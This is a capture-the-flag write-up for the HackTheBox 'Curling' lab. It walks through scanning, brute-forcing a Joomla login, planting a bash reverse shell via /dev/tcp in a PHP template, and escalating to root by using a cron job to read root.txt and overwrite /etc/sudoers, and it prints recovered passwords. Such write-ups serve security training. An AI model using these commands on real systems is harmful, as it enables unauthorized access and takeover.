HackTheBox Curling Writeup
Explore the fundamentals of cybersecurity with the Curling Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.
Add Hosts
Edit the /etc/hosts
file and add the following entries:
1
10.10.10.150 curling.htb
This ensures that your system can resolve the domain names curling.htb
to the correct IP address 10.10.11.242
.
Script to add hosts automatically
1
2
3
ip="10.10.10.150"
domain="curling.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV curling.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-13 15:58 CEST
Nmap scan report for curling.htb (10.10.10.150)
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Determine Joomla Version
Visit the following URL to check the Joomla version:
1
http://curling.htb/administrator/manifests/files/joomla.xml
Brute Force
While inspecting the source of index.php
, you find the following comment:
<!-- secret.txt -->
Navigate to http://curling.htb/secret.txt
to find a Base64-encoded secret.
Decode it to get the password:
1
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password
Brute-Forcing Joomla Login
Use Nmap’s http-joomla-brute
script to brute-force the login:
1
2
3
4
cewl curling.htb | sed '1d' > cewl.out
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password
nmap -p 80 --script http-joomla-brute --script-args userdb=cewl.out,passdb=password,brute.mode=user,brute.firstonly=true curling.htb
rm -rf cewl.out password
This yields the credentials: Floris:Curling2018!
You can now log in at:
1
http://curling.htb/administrator/index.php
Obtaining a Reverse Shell
Go to Extensions > Templates
or visit this direct link.
Run a listener and prepare the payload:
1
2
3
attackerip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "Add in the index.php -> system('bash -c \"bash -i >& /dev/tcp/$attackerip/9001 0>&1\"');"
nc -lvnp 9001
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z
to background the shell, then run:
1
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
1
export TERM=xterm;
Extracting Password Backup
To extract and analyze files:
1
2
3
4
5
6
7
8
9
cp /home/floris/password_backup /dev/shm
cd /dev/shm
cat password_backup
xxd -r password_backup > 1
file 1; bzcat 1 > 2
file 2; zcat 2 > 3
file 3; bzcat 3 > 4
file 4; tar -xvf 4
cat password.txt
This yields the credentials: 5d<wdCbdZu)|hChXll
.
Logging in
To log in via SSH:
1
2
3
4
5
ssh floris@curling.htb
cat user.txt
cd admin-area
echo -e 'url = "file:///root/root.txt"' > input
watch -n 1 cat report
Note: Wait approximately one minute for the flag to appear.
Info
- List Cron Jobs:
/var/spool/cron/crontabs/root
1
2
3
cd /home/floris/admin-area
echo 'url = "file://<path>"' > input
watch -n 1 cat report
Obtaining a Proper Root Shell
Follow the above steps to escalate privileges and gain a root shell.
1
2
3
4
cd /home/floris/admin-area
echo -e "%sudo ALL=(ALL:ALL) ALL\nfloris ALL=(ALL:ALL) ALL" > /tmp/sudoers
echo -e "url = \"file:///tmp/sudoers\"\noutput = \"/etc/sudoers\"" > input
watch -n 1 cat report
Switch to root user
1
sudo su -